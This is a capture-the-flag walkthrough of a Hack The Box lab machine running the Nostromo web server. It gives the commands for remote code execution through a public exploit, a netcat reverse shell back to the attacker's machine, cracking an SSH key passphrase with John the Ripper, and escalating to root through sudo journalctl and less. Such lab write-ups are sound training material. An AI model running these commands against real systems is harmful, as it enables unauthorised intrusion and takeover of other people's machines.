Recon
The first step is to identify all the running services. For this I will use Rustscan as it is very fast.
rustscan -a 10.10.10.165 -- -sC -sVYou can also use Nmap
nmap -sC -sV 10.10.10.165
As we can see ports 22-ssh and 80-http are open. On observing closely we notice that instead of seeing a service like Apache(which we are used to seeing on port 80) we find a service running called Nostromo.
Exploitation
On looking for exploits for Nostromo we find something special…
searchsploit nostromo 1.9.6
Jackpot! We find a direct RCE. And if you are wondering what is on the website, its nothing special, just this web page…
Now let us use the exploit.
The usage is quite simple.
python 47837.py (target ip) (port) (cmd)python 47837.py 10.10.10.165 80 id
The exploit will execute any command we put in the command parameter in the target machine and show us the output.
To get a reverse shell we need to put a command that will give us the reverse shell in the cmd parameter, which you can find from(http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet).
python 47837.py 10.10.10.165 80 'nc (your machine ip) (nc listen port) -e /bin/sh'
Now we have a shell!
On enumerating I find a sensitive file in ‘/var/nostromo/conf’ called nhttpd.conf
This file tells us 2 things. 1)Gives us a password for the user David, which turns out to be useless as you can’t login as david with it.
2)It also tells us about a directory called ‘public_www’ somewhere in /home, I guess it might be in /home/david.
Let us try enterning into /home/David/public_www, and we get in! It contains a folder called ‘protected-file-area’ and has a file called ‘backup-ssh-identity-files.tgz’.
On extracting the .tgz file, we get…
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pubWe find an id_rsa that is encrypted. To decrypt it, let us first convert it to a format that can be cracked by a tool called JohnTheRipper.
ssh2john.py id_rsa > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Now that you have the key for the id_rsa file, you can login using ssh.
ssh -i id_rsa david@10.10.10.165On enumerating the folder bin in david’s home directory, we find a file called ‘sever-stats.sh’.
On looking at the file we see that it is a program that outupts Nostromo’s status.
From this we learn that the user david can run ‘journalctl’ as sudo. On running that last command in the file without piping the output to cat…
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.serviceIt thin uses another application called ‘less’ to show the output.
Note:- If it doesn’t pipe the output in ‘less’ run the command 'stty rows 3'Now its very easy, lets use the common priv esc methodology.
Once you are in less, just type…
!bashand press enter.
And we are root!
The enumeration in this box was a pain for me, but I learnt a lot from it. Hope you enjoyed this writeup.
https://www.hackthebox.eu/home/users/profile/271362
(if you enjoyed, feel free to hit the respect button, please…, it helps boost my confidence and motivates me to publish more write-ups).
